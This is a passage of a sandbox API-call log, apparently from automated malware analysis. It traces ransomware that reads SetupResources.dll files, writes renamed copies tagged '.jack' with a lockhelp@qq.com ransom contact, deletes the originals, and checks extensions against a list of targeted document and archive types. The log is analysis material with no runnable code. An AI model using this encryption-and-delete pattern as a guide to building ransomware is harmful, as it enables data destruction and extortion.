(lpFileName="C:\\588bce7c90097ed212\\1036\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1036\\setupresources.dll.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0196.847] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1036\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8 [0196.847] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.848] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.848] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1036\\setupresources.dll.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x408 [0196.868] GetLastError () returned 0x0 [0196.868] ReadFile (in: hFile=0x3f8, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x4958, lpOverlapped=0x0) returned 1 [0197.102] WriteFile (in: hFile=0x408, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x4960, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x4960, lpOverlapped=0x0) returned 1 [0197.103] ReadFile (in: hFile=0x3f8, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x0, lpOverlapped=0x0) returned 1 [0197.103] WriteFile (in: hFile=0x408, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0xf8, lpOverlapped=0x0) returned 1 [0197.103] SetEndOfFile (hFile=0x408) returned 1 [0197.103] CloseHandle (hObject=0x408) returned 1 [0197.178] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.178] SetEndOfFile (hFile=0x3f8) returned 1 [0197.179] CloseHandle (hObject=0x3f8) returned 1 [0197.179] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1036\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0197.180] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1036\\setupresources.dll")) returned 1 [0197.180] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\SetupResources.dll") returned 45 [0197.180] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\SetupResources.dll") returned 45 [0197.180] lstrlenW (lpString=".doc") returned 4 [0197.180] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.180] lstrlenW (lpString=".docx") returned 5 [0197.180] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0197.180] lstrlenW (lpString=".pdf") returned 4 [0197.180] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.180] lstrlenW (lpString=".xls") returned 4 [0197.180] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.180] lstrlenW (lpString=".xlsx") returned 5 [0197.180] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0197.181] lstrlenW (lpString=".ppt") returned 4 [0197.181] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.181] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\SetupResources.dll") returned 45 [0197.181] lstrlenW (lpString=".zip") returned 4 [0197.181] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.181] lstrlenW (lpString=".rar") returned 4 [0197.181] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.181] lstrlenW (lpString=".bz2") returned 4 [0197.181] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.181] lstrlenW (lpString=".7z") returned 3 [0197.181] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.181] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\SetupResources.dll") returned 45 [0197.181] lstrlenW (lpString=".dbf") returned 4 [0197.181] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.181] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\SetupResources.dll") returned 45 [0197.181] lstrlenW (lpString=".1cd") returned 4 [0197.181] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.181] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\SetupResources.dll") returned 45 [0197.181] lstrlenW (lpString=".jpg") returned 4 [0197.181] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.181] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\SetupResources.dll") returned 45 [0197.181] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\SetupResources.dll") returned 45 [0197.181] lstrlenW (lpString=".doc") returned 4 [0197.181] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.181] lstrlenW (lpString=".docx") returned 5 [0197.182] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0197.182] lstrlenW (lpString=".pdf") returned 4 [0197.182] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.182] lstrlenW (lpString=".xls") returned 4 [0197.182] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.182] lstrlenW (lpString=".xlsx") returned 5 [0197.182] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0197.182] lstrlenW (lpString=".ppt") returned 4 [0197.182] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.182] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\SetupResources.dll") returned 45 [0197.182] lstrlenW (lpString=".zip") returned 4 [0197.182] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.182] lstrlenW (lpString=".rar") returned 4 [0197.182] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.182] lstrlenW (lpString=".bz2") returned 4 [0197.182] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.182] lstrlenW (lpString=".7z") returned 3 [0197.182] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.182] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\SetupResources.dll") returned 45 [0197.182] lstrlenW (lpString=".dbf") returned 4 [0197.182] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.182] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\SetupResources.dll") returned 45 [0197.182] lstrlenW (lpString=".1cd") returned 4 [0197.182] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.182] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\SetupResources.dll") returned 45 [0197.182] lstrlenW (lpString=".jpg") returned 4 [0197.182] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.183] lstrcmpiW (lpString1=".dll", lpString2=".jack") returned -1 [0197.183] lstrlenW (lpString="SetupResources.dll") returned 18 [0197.183] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1045\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8 [0197.184] GetFileSizeEx (in: hFile=0x3f8, lpFileSize=0x32dff14 | out: lpFileSize=0x32dff14*=18264) returned 1 [0197.184] CloseHandle (hObject=0x3f8) returned 1 [0197.184] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1045\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1045\\setupresources.dll")) returned 0x80 [0197.184] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1045\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1045\\setupresources.dll.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0197.184] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1045\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8 [0197.185] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.185] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.185] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1045\\setupresources.dll.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0197.236] GetLastError () returned 0x0 [0197.236] ReadFile (in: hFile=0x3f8, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x4758, lpOverlapped=0x0) returned 1 [0197.251] WriteFile (in: hFile=0x414, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x4760, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x4760, lpOverlapped=0x0) returned 1 [0197.252] ReadFile (in: hFile=0x3f8, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x0, lpOverlapped=0x0) returned 1 [0197.252] WriteFile (in: hFile=0x414, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0xf8, lpOverlapped=0x0) returned 1 [0197.253] SetEndOfFile (hFile=0x414) returned 1 [0197.253] CloseHandle (hObject=0x414) returned 1 [0197.255] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.255] SetEndOfFile (hFile=0x3f8) returned 1 [0197.256] CloseHandle (hObject=0x3f8) returned 1 [0197.256] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1045\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0197.257] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1045\\setupresources.dll")) returned 1 [0197.257] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\SetupResources.dll") returned 45 [0197.257] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\SetupResources.dll") returned 45 [0197.257] lstrlenW (lpString=".doc") returned 4 [0197.257] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.257] lstrlenW (lpString=".docx") returned 5 [0197.257] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0197.257] lstrlenW (lpString=".pdf") returned 4 [0197.258] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.258] lstrlenW (lpString=".xls") returned 4 [0197.258] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.258] lstrlenW (lpString=".xlsx") returned 5 [0197.258] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0197.258] lstrlenW (lpString=".ppt") returned 4 [0197.258] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.258] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\SetupResources.dll") returned 45 [0197.258] lstrlenW (lpString=".zip") returned 4 [0197.258] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.258] lstrlenW (lpString=".rar") returned 4 [0197.258] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.258] lstrlenW (lpString=".bz2") returned 4 [0197.258] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.258] lstrlenW (lpString=".7z") returned 3 [0197.258] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.258] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\SetupResources.dll") returned 45 [0197.258] lstrlenW (lpString=".dbf") returned 4 [0197.258] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.258] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\SetupResources.dll") returned 45 [0197.258] lstrlenW (lpString=".1cd") returned 4 [0197.258] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.258] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\SetupResources.dll") returned 45 [0197.258] lstrlenW (lpString=".jpg") returned 4 [0197.258] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.258] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\SetupResources.dll") returned 45 [0197.259] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\SetupResources.dll") returned 45 [0197.259] lstrlenW (lpString=".doc") returned 4 [0197.259] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.259] lstrlenW (lpString=".docx") returned 5 [0197.259] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0197.259] lstrlenW (lpString=".pdf") returned 4 [0197.259] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.259] lstrlenW (lpString=".xls") returned 4 [0197.259] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.259] lstrlenW (lpString=".xlsx") returned 5 [0197.259] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0197.259] lstrlenW (lpString=".ppt") returned 4 [0197.259] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.259] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\SetupResources.dll") returned 45 [0197.259] lstrlenW (lpString=".zip") returned 4 [0197.259] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.259] lstrlenW (lpString=".rar") returned 4 [0197.259] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.259] lstrlenW (lpString=".bz2") returned 4 [0197.259] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.259] lstrlenW (lpString=".7z") returned 3 [0197.259] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.259] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\SetupResources.dll") returned 45 [0197.259] lstrlenW (lpString=".dbf") returned 4 [0197.259] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.259] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\SetupResources.dll") returned 45 [0197.259] lstrlenW (lpString=".1cd") returned 4 [0197.260] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.260] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\SetupResources.dll") returned 45 [0197.260] lstrlenW (lpString=".jpg") returned 4 [0197.260] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.260] lstrcmpiW (lpString1=".dll", lpString2=".jack") returned -1 [0197.260] lstrlenW (lpString="SetupResources.dll") returned 18 [0197.260] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1053\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8 [0197.260] GetFileSizeEx (in: hFile=0x3f8, lpFileSize=0x32dff14 | out: lpFileSize=0x32dff14*=17752) returned 1 [0197.260] CloseHandle (hObject=0x3f8) returned 1 [0197.260] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1053\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1053\\setupresources.dll")) returned 0x80 [0197.260] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1053\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1053\\setupresources.dll.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0197.261] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1053\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8 [0197.261] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.261] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.261] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1053\\setupresources.dll.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x408 [0197.291] GetLastError () returned 0x0 [0197.291] ReadFile (in: hFile=0x3f8, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x4558, lpOverlapped=0x0) returned 1 [0197.322] WriteFile (in: hFile=0x408, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x4560, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x4560, lpOverlapped=0x0) returned 1 [0197.323] ReadFile (in: hFile=0x3f8, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x0, lpOverlapped=0x0) returned 1 [0197.323] WriteFile (in: hFile=0x408, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0xf8, lpOverlapped=0x0) returned 1 [0197.324] SetEndOfFile (hFile=0x408) returned 1 [0197.324] CloseHandle (hObject=0x408) returned 1 [0197.325] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.325] SetEndOfFile (hFile=0x3f8) returned 1 [0197.326] CloseHandle (hObject=0x3f8) returned 1 [0197.326] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1053\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0197.326] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1053\\setupresources.dll")) returned 1 [0197.327] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\SetupResources.dll") returned 45 [0197.327] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\SetupResources.dll") returned 45 [0197.327] lstrlenW (lpString=".doc") returned 4 [0197.327] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.327] lstrlenW (lpString=".docx") returned 5 [0197.327] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0197.327] lstrlenW (lpString=".pdf") returned 4 [0197.327] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.327] lstrlenW (lpString=".xls") returned 4 [0197.327] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.327] lstrlenW (lpString=".xlsx") returned 5 [0197.327] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0197.327] lstrlenW (lpString=".ppt") returned 4 [0197.327] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.327] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\SetupResources.dll") returned 45 [0197.327] lstrlenW (lpString=".zip") returned 4 [0197.327] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.327] lstrlenW (lpString=".rar") returned 4 [0197.327] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.327] lstrlenW (lpString=".bz2") returned 4 [0197.327] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.327] lstrlenW (lpString=".7z") returned 3 [0197.328] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.328] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\SetupResources.dll") returned 45 [0197.328] lstrlenW (lpString=".dbf") returned 4 [0197.328] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.328] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\SetupResources.dll") returned 45 [0197.328] lstrlenW (lpString=".1cd") returned 4 [0197.328] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.328] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\SetupResources.dll") returned 45 [0197.328] lstrlenW (lpString=".jpg") returned 4 [0197.328] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.328] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\SetupResources.dll") returned 45 [0197.328] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\SetupResources.dll") returned 45 [0197.328] lstrlenW (lpString=".doc") returned 4 [0197.328] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.328] lstrlenW (lpString=".docx") returned 5 [0197.328] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0197.328] lstrlenW (lpString=".pdf") returned 4 [0197.328] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.328] lstrlenW (lpString=".xls") returned 4 [0197.328] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.328] lstrlenW (lpString=".xlsx") returned 5 [0197.328] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0197.328] lstrlenW (lpString=".ppt") returned 4 [0197.328] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.328] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\SetupResources.dll") returned 45 [0197.328] lstrlenW (lpString=".zip") returned 4 [0197.328] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.329] lstrlenW (lpString=".rar") returned 4 [0197.329] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.329] lstrlenW (lpString=".bz2") returned 4 [0197.329] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.329] lstrlenW (lpString=".7z") returned 3 [0197.329] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.329] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\SetupResources.dll") returned 45 [0197.329] lstrlenW (lpString=".dbf") returned 4 [0197.329] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.329] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\SetupResources.dll") returned 45 [0197.329] lstrlenW (lpString=".1cd") returned 4 [0197.329] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.329] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\SetupResources.dll") returned 45 [0197.329] lstrlenW (lpString=".jpg") returned 4 [0197.329] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.329] lstrcmpiW (lpString1=".dll", lpString2=".jack") returned -1 [0197.329] lstrlenW (lpString="SetupResources.dll") returned 18 [0197.329] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\3076\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8 [0197.329] GetFileSizeEx (in: hFile=0x3f8, lpFileSize=0x32dff14 | out: lpFileSize=0x32dff14*=14168) returned 1 [0197.330] CloseHandle (hObject=0x3f8) returned 1 [0197.330] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\3076\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\3076\\setupresources.dll")) returned 0x80 [0197.330] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\3076\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\3076\\setupresources.dll.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0197.330] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\3076\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8 [0197.330] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.330] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.330] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\3076\\setupresources.dll.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x41c [0197.463] GetLastError () returned 0x0 [0197.463] ReadFile (in: hFile=0x3f8, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x3758, lpOverlapped=0x0) returned 1 [0197.480] WriteFile (in: hFile=0x41c, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x3760, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x3760, lpOverlapped=0x0) returned 1 [0197.482] ReadFile (in: hFile=0x3f8, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x0, lpOverlapped=0x0) returned 1 [0197.482] WriteFile (in: hFile=0x41c, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0xf8, lpOverlapped=0x0) returned 1 [0197.482] SetEndOfFile (hFile=0x41c) returned 1 [0197.482] CloseHandle (hObject=0x41c) returned 1 [0197.483] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.483] SetEndOfFile (hFile=0x3f8) returned 1 [0197.484] CloseHandle (hObject=0x3f8) returned 1 